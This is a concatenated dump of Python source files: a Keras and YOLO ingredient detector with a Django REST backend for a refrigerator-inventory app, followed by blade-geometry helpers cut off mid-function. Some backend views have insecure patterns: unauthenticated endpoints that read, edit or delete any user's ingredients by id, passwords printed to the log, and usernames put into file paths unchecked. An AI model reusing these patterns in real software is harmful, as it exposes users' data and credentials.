# Freeze all the layers before the `fine_tune_at` layer
for layer in base_model.layers[:fine_tune_at]:
    layer.trainable = False

# Recompile with a 10x smaller learning rate for fine-tuning.
model.compile(loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
              optimizer = tf.keras.optimizers.RMSprop(lr=base_learning_rate/10),
              metrics=['accuracy'])
model.summary()
print(len(model.trainable_variables))

fine_tune_epochs = 1
total_epochs = initial_epochs + fine_tune_epochs

history_fine = model.fit(train_batches,
                         epochs=total_epochs,
                         initial_epoch = history.epoch[-1],
                         validation_data=validation_batches)

# Extend the stage-1 curves with the fine-tuning history.
acc += history_fine.history['accuracy']
val_acc += history_fine.history['val_accuracy']
loss += history_fine.history['loss']
val_loss += history_fine.history['val_loss']
--- FILE SEPARATOR ---
import tensorflow as tf
# Show pictures
import os, random
import matplotlib.pyplot as plt
import numpy as np
from keras.preprocessing import image
# Base variables must be defined before show_pictures is called below —
# bug fix: the original called show_pictures(train_cats_dir) before
# train_cats_dir / img_width / img_height were assigned (NameError).
base_dir = '/Users/macbook/book/dogs_cats/data'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
test_dir = os.path.join(base_dir, 'test')
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, 'dogs')
train_size, validation_size, test_size = 200, 100, 100
img_width, img_height = 224, 224  # Default input size for VGG16


def show_pictures(path):
    """Display one random image from `path`, normalized for plt.imshow."""
    random_img = random.choice(os.listdir(path))
    img_path = os.path.join(path, random_img)
    img = image.load_img(img_path, target_size=(img_width, img_height))
    img_tensor = image.img_to_array(img)  # image data encoded as integers in the 0-255 range
    img_tensor /= 255.  # normalize to [0, 1] for plt.imshow
    plt.imshow(img_tensor)
    plt.show()


# Show two random samples from each class.
for i in range(0, 2):
    show_pictures(train_cats_dir)
    show_pictures(train_dogs_dir)
--- FILE SEPARATOR ---
from django.contrib import admin
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from rest_framework.permissions import AllowAny
from django.urls import path, include
from rest_framework_jwt.views import obtain_jwt_token
from rest_framework_jwt.views import refresh_jwt_token
from rest_framework_jwt.views import verify_jwt_token
# drf_yasg schema view: serves the auto-generated OpenAPI document.
# public=True together with AllowAny makes the raw schema visible to
# unauthenticated clients.
schema_view = get_schema_view(
    openapi.Info(
        # Required arguments
        title="figeMonitor API",
        default_version="v1",
        # Optional arguments
        description="API 서비스입니다.",
        terms_of_service="https://www.google.com/policies/terms/",
        contact=openapi.Contact(email="ihs3583@gmail.com"),
        license=openapi.License(name="SSAFY License"),
    ),
    public=True,
    permission_classes=( AllowAny,),
)

# URL routing: JWT auth endpoints, Django admin, the user API app and the
# interactive Swagger UI.
urlpatterns = [
    path('api-token-auth/', obtain_jwt_token),
    path('api-token-refresh/', refresh_jwt_token),
    path('api-token-verify/', verify_jwt_token),
    path('admin/', admin.site.urls),
    path('userapi/', include('userApi.urls')),
    path('swagger/', schema_view.with_ui('swagger'), name='schema-swagger-ui'),
]
--- FILE SEPARATOR ---
import os
import sys
import csv
import argparse
from media.AI.keras_yolo3.yolo import YOLO, detect_video
from PIL import Image
from timeit import default_timer as timer
from media.AI.Utils.utils import load_extractor_model, load_features, parse_input, detect_object
import test
from media.AI.Utils import utils
import pandas as pd
import numpy as np
from media.AI.Utils.Get_File_Paths import GetFileList
from keras import backend
import random
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
# Lookup table mapping YOLO class labels to the ingredient metadata returned
# by the API: display name (Korean), shelf life in days ('expirationDate'),
# category ('kind') and a free-form note.
# NOTE(review): 'corn' and 'broccoli' carry kind '육류' (meat) — looks like a
# copy/paste slip from the 'meat' entry; confirm the intended category.
# NOTE(review): the 'parprika*' keys are misspelled but must match the
# labels in data_classes.txt, so do not rename without retraining data.
infos = {'onion': {'name': '양파',
                   'expirationDate': 7,
                   'kind': '야채',
                   'note': '',},
         'carrot':{'name': '당근',
                   'expirationDate': 14,
                   'kind': '야채',
                   'note': '',},
         'potato':{'name': '감자',
                   'expirationDate': 5,
                   'kind': '야채',
                   'note': '',},
         'greenOnion':{'name': '대파',
                       'expirationDate': 10,
                       'kind': '야채',
                       'note': '',},
         'garlic':{'name': '마늘',
                   'expirationDate': 14,
                   'kind': '야채',
                   'note': '',},
         'garlicPart':{'name': '마늘',
                       'expirationDate': 14,
                       'kind': '야채',
                       'note': '',},
         'tomato_top':{'name': '토마토',
                       'expirationDate': 14,
                       'kind': '야채',
                       'note': '',},
         'tomato_side':{'name': '토마토',
                        'expirationDate': 14,
                        'kind': '야채',
                        'note': '',},
         'green-chili':{'name': '풋고추',
                        'expirationDate': 10,
                        'kind': '야채',
                        'note': '',},
         'egg_white':{'name': '계란',
                      'expirationDate': 14,
                      'kind': '야채',
                      'note': '',},
         'egg_brown':{'name': '계란',
                      'expirationDate': 14,
                      'kind': '야채',
                      'note': '',},
         'parprika':{'name': '파프리카',
                     'expirationDate': 21,
                     'kind': '야채',
                     'note': '',},
         'parprika_top':{'name': '파프리카',
                         'expirationDate': 21,
                         'kind': '야채',
                         'note': '',},
         'enoki-mushroom':{'name': '팽이버섯',
                           'expirationDate': 5,
                           'kind': '야채',
                           'note': '',},
         'king_oyster_mushroom':{'name': '느타리버섯',
                                 'expirationDate': 5,
                                 'kind': '야채',
                                 'note': '',},
         'agaricus_bisporus':{'name': '새송이버섯',
                              'expirationDate': 14,
                              'kind': '야채',
                              'note': '',},
         'meat':{'name': '고기',
                 'expirationDate': 3,
                 'kind': '육류',
                 'note': '',},
         'corn':{'name': '옥수수',
                 'expirationDate': 3,
                 'kind': '육류',
                 'note': '',},
         'broccoli':{'name': '브로콜리',
                     'expirationDate': 7,
                     'kind': '육류',
                     'note': '',},
         'raw-chicken':{'name': '닭고기',
                        'expirationDate': 2,
                        'kind': '육류',
                        'note': '',},
         }
# Resolve all model/data paths relative to this file so the detector works
# regardless of the current working directory.
src_path = os.path.dirname(os.path.abspath(__file__))
utils_path = os.path.join(src_path, "Utils")
sys.path.append(src_path)
sys.path.append(utils_path)
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"  # Hide TensorFlow warnings
data_folder = os.path.join(src_path, "Data")
image_test_folder = os.path.join(data_folder, "Test_Images")
detection_results_folder = os.path.join(data_folder, "Results")
detection_results_file = os.path.join(detection_results_folder, "Detection_Results.csv")
model_folder = os.path.join(data_folder, "Model_Weights")
model_weights = os.path.join(model_folder, "trained_weights_final.h5")
model_classes = os.path.join(model_folder, "data_classes.txt")
anchors_path = os.path.join(src_path, "keras_yolo3", "model_data", "yolo_anchors.txt")
def detector(input_image, username):
    """Run YOLO on an uploaded image and return ingredient info dicts.

    Saves the upload into the scratch test-image folder, runs detection,
    writes a CSV of bounding boxes, keeps the highest-confidence box per
    label, crops it into the user's crop_img folder, and returns the
    matching entries from the module-level `infos` table.
    """
    file = input_image["file"]
    if not os.path.exists(image_test_folder):
        os.makedirs(image_test_folder)
    # NOTE(review): the backslash separator is Windows-only; os.path.join
    # would be portable.
    path = default_storage.save(image_test_folder+'\\buf_img.jpg', ContentFile(file.read()))
    input_paths = GetFileList(image_test_folder)
    # NOTE(review): ".jpg" appears twice — the second entry was presumably
    # meant to be ".jpeg".
    img_endings = (".jpg", ".jpg", ".png")
    vid_endings = (".mp4", ".mpeg", ".mpg", ".avi")
    input_img = Image.open(input_paths[0])
    input_image_paths = [input_paths[0]]
    output_path = detection_results_folder
    if not os.path.exists(output_path):
        os.makedirs(output_path)
    yolo = YOLO(
        **{
            "model_path": model_weights,
            "anchors_path": anchors_path,
            "classes_path": model_classes,
            "score": 0.1,  # confidence threshold for accepting a prediction
            "gpu_num": 1,
            "model_image_size": (416, 416),
        }
    )
    out_df = pd.DataFrame(
        columns=[
            "image", "image_path", "xmin", "ymin", "xmax", "ymax", "label", "confidence", "x_size", "y_size",
        ]
    )
    class_file = open(model_classes, "r")
    input_labels = [line.rstrip("\n") for line in class_file.readlines()]
    print("Found {} input labels: {} ...".format(len(input_labels), input_labels))
    if input_image_paths:
        print(
            "Found {} input images: {} ...".format(
                len(input_image_paths),
                [os.path.basename(f) for f in input_image_paths[:5]],
            )
        )
        start = timer()
        text_out = ""
        # This is for images
        prediction, image = detect_object(
            yolo,
            input_paths[0],
            save_img=False,
            save_img_path=detection_results_folder,
            postfix='_detect',
        )
        y_size, x_size, _ = np.array(image).shape
        # One CSV row per detected box.
        # NOTE(review): DataFrame.append is removed in pandas 2.x;
        # pd.concat is the modern equivalent.
        for single_prediction in prediction:
            out_df = out_df.append(
                pd.DataFrame(
                    [
                        [
                            os.path.basename(input_paths[0].rstrip("\n")),
                            input_paths[0].rstrip("\n"),
                        ]
                        + single_prediction
                        + [x_size, y_size]
                    ],
                    columns=[
                        "image", "image_path", "xmin", "ymin", "xmax", "ymax", "label", "confidence", "x_size", "y_size",
                    ],
                )
            )
        end = timer()
        print(
            "Processed {} images in {:.1f}sec - {:.1f}FPS".format(
                len(input_image_paths),
                end - start,
                len(input_image_paths) / (end - start),
            )
        )
    out_df.to_csv(detection_results_file, index=False)
    # yolo.close_session()
    backend.clear_session()
    # Re-read the CSV and keep only the highest-confidence detection per
    # label.  (This local name shadows the module-level data_folder.)
    data_folder = os.path.join(src_path, 'Data/Results/Detection_Results.csv')
    label_path = os.path.join(src_path, 'Data/Model_Weights/data_classes.txt')
    class_file = open(label_path, "r")
    input_labels = [line.rstrip("\n") for line in class_file.readlines()]
    rownum = 0
    # for file in os.scandir(src_path+'\\crop_img'):
    #     os.remove(file.path)
    dec_img = dict()
    with open(data_folder, newline='') as csvfile:
        reader = csv.reader(csvfile)
        for r in reader:
            if rownum == 0:
                header = r
                rownum += 1
                continue
            img = Image.open(r[1])
            # dec_img[label] = [confidence, image_path, xmin, ymin, xmax, ymax]
            if not dec_img.get(input_labels[int(r[6])]):
                dec_img[input_labels[int(r[6])]] = [r[7], r[1], int(r[2]), int(r[3]), int(r[4]), int(r[5])]
            else:
                if dec_img[input_labels[int(r[6])]][0] < r[7]:
                    dec_img[input_labels[int(r[6])]] = [r[7], r[1], int(r[2]), int(r[3]), int(r[4]), int(r[5])]
            rownum += 1
    result = []
    for key, value in dec_img.items():
        # Crop the winning bounding box and save it under the user's folder.
        img = Image.open(value[1])
        area = (value[2], value[3], value[4], value[5])
        cropped_img = img.crop(area)
        cropped_img = cropped_img.convert("RGB")
        if not os.path.exists('./media/AI/crop_img/'+username+'/'):
            os.makedirs('./media/AI/crop_img/'+username+'/')
        nam = infos.get(key).get('name')
        cropped_img.save('./media/AI/crop_img/'+username+'/'+nam+'.jpg')
        result.append(infos[key])
    return result
--- FILE SEPARATOR ---
from django.contrib import admin
from .models import *
from django.contrib.auth.models import User
# @admin.register(User)
# class userAdmin(admin.ModelAdmin):
# list_display = ['id','username','email']
@admin.register(ingredients)
class foodAdmin(admin.ModelAdmin):
    """Admin configuration for the ingredients model."""
    # Columns shown on the changelist page in Django admin.
    list_display = ['user','name','section','floor','created_at', 'expire_date', 'image', 'classification', 'content', ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-06-04 06:32
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relax `contents.content` (allow blank/null) and switch
    `contents.created_at` to auto-populate on row creation."""

    dependencies = [
        ('userApi', '0002_contents'),
    ]
    operations = [
        migrations.AlterField(
            model_name='contents',
            name='content',
            field=models.TextField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='contents',
            name='created_at',
            field=models.DateField(auto_now_add=True),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-06-04 06:40
from django.db import migrations, models
class Migration(migrations.Migration):
    """Store `contents.expire_date` as a 10-character string ('YYYY-MM-DD')."""

    dependencies = [
        ('userApi', '0003_auto_20200604_1532'),
    ]
    operations = [
        migrations.AlterField(
            model_name='contents',
            name='expire_date',
            field=models.CharField(max_length=10),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-06-04 10:15
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an integer `floor` column (default 1) to `contents`."""

    dependencies = [
        ('userApi', '0004_auto_20200604_1540'),
    ]
    operations = [
        migrations.AddField(
            model_name='contents',
            name='floor',
            field=models.IntegerField(default=1),
        ),
    ]
--- FILE SEPARATOR ---
from django.db import models
from django.conf import settings
from django.contrib.auth.models import User
class inputFile(models.Model):
    """Holds a single uploaded image used as detector input."""
    image = models.ImageField(blank=False, null=False,)
class refrigeSection(models.Model):
    """A named refrigerator section owned by one user."""
    name = models.CharField(max_length=20)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
class ingredients(models.Model):
    """One ingredient stored in a user's refrigerator.

    expire_date is kept as a 'YYYY-MM-DD' string (the views slice it for
    date arithmetic); floor locates the item inside the fridge.
    """
    name = models.CharField(max_length=30)
    image = models.ImageField(blank=True)
    section = models.CharField(blank=True, max_length=20)
    floor = models.IntegerField(default = 0)
    created_at = models.DateField(auto_now_add=True)
    expire_date = models.CharField(max_length=10)
    classification = models.CharField(max_length=30)  # category label, e.g. vegetable/meat
    content = models.TextField(null=True, blank=True)  # free-form note
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    def __str__(self):
        return self.name
--- FILE SEPARATOR ---
from rest_framework import serializers
from django.contrib.auth.models import User
from .models import refrigeSection, inputFile, ingredients
class UserCreationSerializer(serializers.ModelSerializer):
    """Serializer for the sign-up payload (the view hashes the password afterwards)."""
    class Meta:
        model = User
        fields = ['id','username','password', 'email']
class UserSerializer(serializers.ModelSerializer):
    """Read-only representation of a user account."""
    # A given user's related objects (one-to-many -> many=True), kept for reference:
    # todo_set = TodoSerializer(many=True)
    class Meta:
        model = User
        fields = ['id','email','username']
class PasswordChangeSerializer(serializers.ModelSerializer):
    """Accepts only the new password for the password-change endpoint."""
    # newPassword = serializers.CharField(required=True)
    class Meta:
        model = User
        fields = ['password',]
class SectionSerializer(serializers.ModelSerializer):
    """Exposes just the refrigerator-section name."""
    class Meta:
        model = refrigeSection
        fields = ['name']
class ImageSerializer(serializers.ModelSerializer):
    """Wraps the uploaded detector input image."""
    class Meta:
        model = inputFile
        fields = ['image']
# class ingredientsSerializer(serializers.ModelSerializer):
# class Meta:
# model = ingredients
# fields = '__all__'
--- FILE SEPARATOR ---
from rest_framework.response import Response
from django.http import HttpResponseNotFound, HttpResponseForbidden
from django.shortcuts import get_object_or_404
from rest_framework.permissions import AllowAny
from rest_framework.decorators import api_view, permission_classes
from django.contrib.auth.models import User
from .serializers import UserCreationSerializer,UserSerializer,PasswordChangeSerializer, ImageSerializer, SectionSerializer
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from media.AI import Image_Searcher
from .models import ingredients
import os
import datetime, json
from shutil import copyfile
# Today's date, captured once at module import and used for all
# expiry-date arithmetic in this module.  (The original built this by
# slicing str(datetime.now()) and re-parsing the pieces — equivalent to
# date.today(), just slower and harder to read.)
# NOTE(review): a long-running server process keeps using the import-day
# date after midnight; recompute per request if that matters.
current = datetime.date.today()
@api_view(['GET'])
@permission_classes((AllowAny,))
def checkOverlap(request):
    """Return False when the requested username is already taken, True otherwise."""
    # NOTE(review): request.data is used directly as the username.  For a
    # GET request this is typically an empty dict — presumably the client
    # sends the raw username in the body; confirm against the frontend.
    username = request.data
    if User.objects.filter(username=username):
        return Response(False)
    else:
        return Response(True)
@api_view(['POST'])
# Override the project-level IsAuthenticated default so anonymous
# visitors can register.
@permission_classes((AllowAny, ))
def signUp(request):
    """Create a new user account from the posted credentials."""
    serializer = UserCreationSerializer(data=request.data)
    print("username:",serializer.initial_data)
    username = serializer.initial_data.get('username')
    if serializer.is_valid():
        # serializer.save() returns the created model instance.
        user = serializer.save()
        # set_password hashes the raw password (the serializer stored it verbatim).
        user.set_password(request.data.get('password'))
        user.save()
        print(serializer.data)
        return Response({'message': '회원가입이 성공적으로 완료되었습니다.'})
    else:
        return Response(serializer.errors, status=400)
# Swagger documentation helpers for user_manage.
user_manage_param = openapi.Parameter('password', openapi.IN_QUERY, type=openapi.TYPE_STRING)
user_response = openapi.Response('response description', UserSerializer)
@swagger_auto_schema(method='put', manual_parameters=[user_manage_param], responses={200: user_response})
@api_view(['GET','PUT','DELETE'])
def user_manage(request, id):
    """Retrieve (GET), change password (PUT) or delete (DELETE) one user.

    Only the authenticated user may operate on their own record.
    """
    user = get_object_or_404(User,pk=id)
    # print("user method:",dir(user))
    if request.user != user:
        # Equivalent to Response(status=403).
        return HttpResponseForbidden()
    if request.method == 'GET':
        serializer = UserSerializer(user)
        return Response(serializer.data)
    if request.method == 'PUT':
        # Validate the posted password against the existing user record.
        serializer = PasswordChangeSerializer(user,request.POST)
        usercheck = serializer
        print(usercheck)
        if serializer.is_valid():
            print('PASSWORD:',request.data.get('password'))
            user.set_password(request.data.get('password'))
            user.save()
            return Response(serializer.data)
        # Invalid payload: return the validation errors with HTTP 400.
        return Response(serializer.errors, status=400)
    if request.method == 'DELETE':
        user.delete()
        print("IS_DELETED:",User.objects.filter(pk=id))
        # 204: the resource no longer exists after deletion.
        return Response(status=204)
@api_view(['POST'])
def get_image(request):
    """Placeholder endpoint: logs the request and always answers 404."""
    print(request)
    return Response(status=404)
# Swagger documentation helpers for the detector endpoint.
user_manage_param = openapi.Parameter('image', openapi.IN_QUERY, type=openapi.TYPE_FILE)
user_response = openapi.Response('response description', UserSerializer)
@swagger_auto_schema(method='post', manual_parameters=[user_manage_param], responses={200: user_response})
@api_view(['POST'])
@permission_classes((AllowAny, ))
def test(request):
    """Run the YOLO ingredient detector on an uploaded image and return matches."""
    # return Response({'message:url&view test success!'})
    # print(dir(request.query_params))
    serializer = ImageSerializer(data=request.data)  # NOTE(review): built but never validated or used
    result = Image_Searcher.detector(request.data, request.data.get('username'))
    # Clear the scratch folder so the next upload starts from empty.
    # NOTE(review): the detector writes into 'Test_Images' (capital I) —
    # confirm this lowercase path still matches on case-sensitive filesystems.
    for file in os.scandir('./media/AI/Data/Test_images/'):
        os.remove(file.path)
    return Response(result)
@api_view(['POST'])
@permission_classes((AllowAny, ))
def addIngredients(request):
    """Bulk-create ingredient rows from a posted list of detector results.

    Each item supplies name / user_id / floor / kind plus an
    'expirationDate' offset in days; expire_date is stored as an ISO
    'YYYY-MM-DD' string relative to today.
    """
    print(request.data)
    if request.method == 'POST':
        for req_data in request.data:
            # Shelf life in days -> absolute expiry date.
            postpone = req_data.get('expirationDate')
            days = current + datetime.timedelta(int(postpone))
            # Bug fix: the image used to be read from the misspelled key
            # 'iamge' (always None for clients sending 'image').  Prefer
            # the correct key but keep the typo as a fallback so any old
            # client payloads still work.
            image_value = req_data.get('image', req_data.get('iamge'))
            food = ingredients(name=req_data.get('name'),
                               image=image_value,
                               user_id=req_data.get('user_id'),
                               floor=req_data.get('floor'),
                               expire_date=str(days)[:10],
                               classification=req_data.get('kind'))
            food.save()
        return Response(status=200)
@api_view(['GET'])
@permission_classes((AllowAny, ))
def getIngredients(request,id):
    """Return every ingredient belonging to user *id* as a list of rows.

    Row layout: [name, expire_date, created_at, classification, content,
    floor, days-until-expiry, ingredient id].
    """
    user = User.objects.get(id = id)
    food_lists = ingredients.objects.filter(user_id = id)
    foods = []
    for food_list in food_lists:
        # Ensure the user's crop-image folder exists and every ingredient
        # has at least a placeholder thumbnail.
        if not os.path.exists('./media/AI/crop_img/'+user.username+'/'):
            os.makedirs('./media/AI/crop_img/'+user.username+'/')
        if not os.path.exists('./media/AI/crop_img/'+user.username+'/'+food_list.name[:10]+'.jpg'):
            copyfile('./media/AI/crop_img/no_image.jpg', './media/AI/crop_img/'+user.username+'/'+food_list.name[:10]+'.jpg' )
            pass
        food = []
        food.append(food_list.name)
        food.append(food_list.expire_date)
        food.append(food_list.created_at)
        food.append(food_list.classification)
        food.append(food_list.content)
        food.append(food_list.floor)
        # expire_date is a 'YYYY-MM-DD' string; compute remaining days.
        postpone = datetime.date(int(food_list.expire_date[:4]), int(food_list.expire_date[5:7]), int(food_list.expire_date[8:]))
        sub_days = postpone - current
        food.append(sub_days.days)
        food.append(food_list.id)
        foods.append(food)
    return Response(foods)
@api_view(['PUT','DELETE'])
@permission_classes((AllowAny, ))
def updateIngredients(request,id):
    """Update (PUT) or remove (DELETE) a single ingredient row.

    PUT accepts either a bare int (a floor move; the stored floor becomes
    4 - value) or a full attribute dict.
    """
    data = request.data
    food = ingredients.objects.get(pk=id)
    if request.method =='PUT':
        print(request.data)
        if type(data) == int:
            # NOTE(review): floors appear to be numbered top-down on the
            # client, hence the 4 - data inversion — confirm with frontend.
            food.floor = 4-data
            food.save()
        else:
            food.name = data['name']
            food.image = data['img_path']
            food.floor = data['floor']
            # 'expirationDate' is an offset in days from today.
            date = current + datetime.timedelta(days=int(data['expirationDate']))
            food.expire_date = date
            food.classification = data['category']
            food.content = data['note']
            food.save()
    if request.method =='DELETE':
        food.delete()
        return Response(status=204)
    return Response(data, status=204)
|
[
"/AI/IMAGE_DETECTION/Image_Searcher.py",
"/AI/transferLearning/TL.py",
"/AI/transferLearning/TL3.py",
"/web/backend/backend/urls.py",
"/web/backend/media/AI/Image_Searcher.py",
"/web/backend/userApi/admin.py",
"/web/backend/userApi/migrations/0003_auto_20200604_1532.py",
"/web/backend/userApi/migrations/0004_auto_20200604_1540.py",
"/web/backend/userApi/migrations/0005_contents_floor.py",
"/web/backend/userApi/models.py",
"/web/backend/userApi/serializers.py",
"/web/backend/userApi/views.py"
] |
0110lekniw/blade-geometry
|
from methods.excel_import import importRotorCharacteristics, importCanalCoordinates, importRotorCoordinates
# Load the rotor blade geometry, its characteristics and the canal contour
# from the Excel workbooks.  Paths are machine-specific absolute paths.
rotor_37_coordinates = importRotorCoordinates(
    '/Volumes/Bridge/Aviation /Bachelor/blade-geometry/Rotor_Coordinates.xlsx')
rotor_37_charateristics = importRotorCharacteristics(
    '/Volumes/Bridge/Aviation /Bachelor/blade-geometry/Rotor_Coordinates.xlsx')
canal_coordinates = importCanalCoordinates(
    '/Volumes/Bridge/Aviation /Bachelor/blade-geometry/Canal.xlsx')
--- FILE SEPARATOR ---
import numpy as np
import math
import cmath
def quadraticRealRoots(a, b, c):
    """Return the real root(s) of a*x**2 + b*x + c = 0.

    Returns a single float for a double root, a two-element list
    [(-b-sqrt(D))/2a, (-b+sqrt(D))/2a] for two distinct roots, and the
    sentinel 0 when there are no real roots (kept from the original API).
    Bug fix: a == 0 used to fall through after printing and divide by
    zero; it now returns the sentinel immediately.
    """
    roots = 0
    if a == 0:
        print("Not a quadratic equation")
        return roots
    discriminant = b**2 - 4*a*c
    if discriminant == 0:
        # One (double) root.
        roots = -b/(2*a)
    elif discriminant > 0:
        root_1 = (-b-math.sqrt(discriminant))/(2*a)
        root_2 = (-b+math.sqrt(discriminant))/(2*a)
        roots = [root_1, root_2]
    else:
        print("No roots in the set of real numbers ")
    return roots
def quadraticRoots(a, b, c):
    """Return both (possibly complex) roots of a*x**2 + b*x + c = 0 as a list.

    Coefficients may be real or complex.  Bug fix: the original built a
    real-dtype numpy array from real inputs and then tried to assign
    complex values into it element-wise, which raises a TypeError;
    constructing the array with dtype=complex handles every input type.
    """
    coefficients = np.array([a, b, c], dtype=complex)
    discriminant = coefficients[1]**2 - coefficients[0]*coefficients[2]*4
    root_1 = (-coefficients[1] - cmath.sqrt(discriminant)) / (2 * coefficients[0])
    root_2 = (-coefficients[1] + cmath.sqrt(discriminant)) / (2 * coefficients[0])
    return [root_1, root_2]
def linearCramerRoots(left_hand_side_matrix, right_hand_side_matrix):
    """Solve a square linear system via Cramer's rule.

    Each unknown is the ratio of the determinant of the column-substituted
    matrix to the main determinant.  Determinants are rounded to 10
    decimal places to damp floating-point noise.
    """
    roots = np.zeros(left_hand_side_matrix.shape[0])
    main_determination = round(np.linalg.det(left_hand_side_matrix), 10)
    for column in range(left_hand_side_matrix.shape[1]):
        substituted = np.array(left_hand_side_matrix)
        substituted[:, column] = right_hand_side_matrix[:, 0]
        column_determination = round(np.linalg.det(substituted), 10)
        roots[column] = column_determination / main_determination
    return roots
--- FILE SEPARATOR ---
import pandas as pd
import numpy as np
import math
# import coordinates of rotor blade and create numpy array
def importRotorCoordinates(coordinates_excel_path):
    """Read blade-profile coordinates from every sheet of the workbook.

    Returns an array of shape (max_points, 6, n_profiles): columns 0-1
    hold pressure-side x/y, columns 3-4 suction-side x/y, column 5 the
    profile radius from sheet cell (0, 1).  Shorter profiles are
    zero-padded to the longest sheet.
    """
    profiles_number = np.array(pd.ExcelFile(coordinates_excel_path).sheet_names).shape[0]
    # First pass: find the longest coordinate list so all sheets fit one array.
    number_of_coordinates = 0
    for i in range(profiles_number):
        coordinates = pd.read_excel(coordinates_excel_path, sheet_name=i).to_numpy()[7:, :]
        if coordinates.shape[0] > number_of_coordinates:
            number_of_coordinates = coordinates.shape[0]
    rotor_coordinates = np.zeros((number_of_coordinates, 6, profiles_number))
    for i in range(profiles_number):
        data = pd.read_excel(coordinates_excel_path, sheet_name=i).to_numpy()
        # Rows 0-6 of each sheet are header metadata; coordinates start at row 7.
        pressure_side_coordinates = np.array([data[7:, 0], data[7:, 1]]).transpose()
        suction_side_coordinates = np.array([data[7:, 0], data[7:, 2]]).transpose()
        rotor_coordinates[:pressure_side_coordinates.shape[0], :2, i] = pressure_side_coordinates[:, :]
        # NOTE(review): the radius is written into column 3 here and is then
        # overwritten by the suction-side x below — column 2 was probably
        # intended.  Confirm against the downstream consumer.
        rotor_coordinates[:pressure_side_coordinates.shape[0], 3, i] = data[0, 1]
        rotor_coordinates[:suction_side_coordinates.shape[0], 3:5, i] = suction_side_coordinates[:, :]
        rotor_coordinates[:pressure_side_coordinates.shape[0], 5, i] = data[0, 1]
    return rotor_coordinates
# import coordinates of canal and create numpy array
def importCanalCoordinates(canal_excel_path):
    """Read the canal contour from the first sheet of the workbook."""
    coordinates = pd.read_excel(canal_excel_path).to_numpy()
    return coordinates
# import charateristics of rotor and create numpy array
def importRotorCharacteristics(characterstics_excel_path):
    """Read the six per-profile characteristic values from each sheet.

    Row meanings (values taken from column 1 of each sheet):
      0 = radius of profile;
      1 = radius of the leading edge;
      2 = radius of the trailing edge;
      3 = x distance between beginning of the profile and stocking point;
      4 = y distance between beginning of the profile and stocking point;
      5 = angle of turn of coordinates around stocking point
          (sheet stores degrees; the array stores radians).
    """
    profiles_number = np.array(pd.ExcelFile(characterstics_excel_path).sheet_names).shape[0]
    rotor_characteristic = np.zeros((6, profiles_number))
    for i in range(profiles_number):
        data = pd.read_excel(characterstics_excel_path, sheet_name=i).to_numpy()
        rotor_characteristic[:5, i] = data[:5, 1]
        # Convert the turn angle from degrees to radians.
        rotor_characteristic[5, i] = data[5, 1] * (math.pi / 180)
    return rotor_characteristic
--- FILE SEPARATOR ---
import numpy as np
import math
from methods.equations_solver import linearCramerRoots
# Build a line through two points.
def twoPointsLinearFunction(point_one, point_two):
    """Return a np.poly1d line through two points, or 'non_func' if vertical."""
    x1, y1 = point_one[0], point_one[1]
    x2, y2 = point_two[0], point_two[1]
    if x1 == x2:
        # A vertical line has no slope-intercept representation.
        print('no function')
        return 'non_func'
    slope = (y2 - y1) / (x2 - x1)
    intercept = y1 - x1 * slope
    return np.poly1d([slope, intercept])
# Calculation of linear functions intersection point
def linearFunctionsIntersections(function_one, function_two):
    """Return [x, y] where two np.poly1d lines cross.

    For np.poly1d, p[1] is the slope and p[0] the intercept; solving
    a1*x + b1 = a2*x + b2 gives x = (b2 - b1) / (a1 - a2).  Bug fix: the
    original divided by (a2 - a1), which negates x and yields a point
    that lies on neither line.
    """
    x = (function_two[0]-function_one[0])/(function_one[1]-function_two[1])
    return np.array([x, function_two(x)])
# Build a [dx, dy, length] vector description.
def vectorCalculation(terminal_point, initial_point):
    """Return [dx, dy, modulo] for the vector from *initial_point* to *terminal_point*."""
    dx = terminal_point[0] - initial_point[0]
    dy = terminal_point[1] - initial_point[1]
    length = math.sqrt(dx**2 + dy**2)
    return np.array([dx, dy, length])
def scalarProductVector(vector_1, vector_2):
    """Return the 2-D dot product of the two vectors (x and y components only)."""
    return vector_1[0]*vector_2[0] + vector_1[1]*vector_2[1]
def degreeBetweenVectors(vector_1, vector_2):
    """Return the angle (radians) between two [dx, dy, length] vectors."""
    # Dot product over the x/y components (inlined), normalized by the
    # stored lengths at index 2.
    dot = vector_1[0]*vector_2[0] + vector_1[1]*vector_2[1]
    return math.acos(dot/(vector_1[2]*vector_2[2]))
def averageDegreeBisectorEquation(linear_one, linear_two, which_one):
    """Return an angle bisector (np.poly1d) of two intersecting lines.

    which_one == 'smaller' selects the bisector built from the averaged
    slopes; any other value selects the perpendicular bisector.
    """
    # dc - directional coefficient (slope)
    bisector_dc_smaller_angle = math.tan((math.atan(linear_one[1]) + math.atan(linear_two[1])) / 2)
    intersection_point = linearFunctionsIntersections(linear_one, linear_two)
    bisector_coefficient_smaller_angle = intersection_point[1] - intersection_point[0]*bisector_dc_smaller_angle
    # NOTE(review): linear_one[0] (the intercept for poly1d) is used here
    # where the slope linear_one[1] is used elsewhere — confirm intent.
    vector_one = vectorCalculation(intersection_point, np.array([intersection_point[0]+1,
                                   (intersection_point[0]+1)*linear_one[0]+linear_one[1]]))
    vector_two = vectorCalculation(intersection_point, np.array([intersection_point[0]+1,
                                   (intersection_point[0]+1)*bisector_dc_smaller_angle+bisector_coefficient_smaller_angle]))
    smaller_degree = degreeBetweenVectors(vector_one, vector_two)
    if bisector_dc_smaller_angle == 0:
        bisector_dc_larger_angle = 1
    elif smaller_degree > math.pi/2:
        smaller_degree = smaller_degree-math.pi/2
        bisector_dc_smaller_angle = -1/bisector_dc_smaller_angle
        # NOTE(review): bisector_dc_larger_angle is NOT assigned on this
        # branch, so the line below raises NameError when it is taken.
    else:
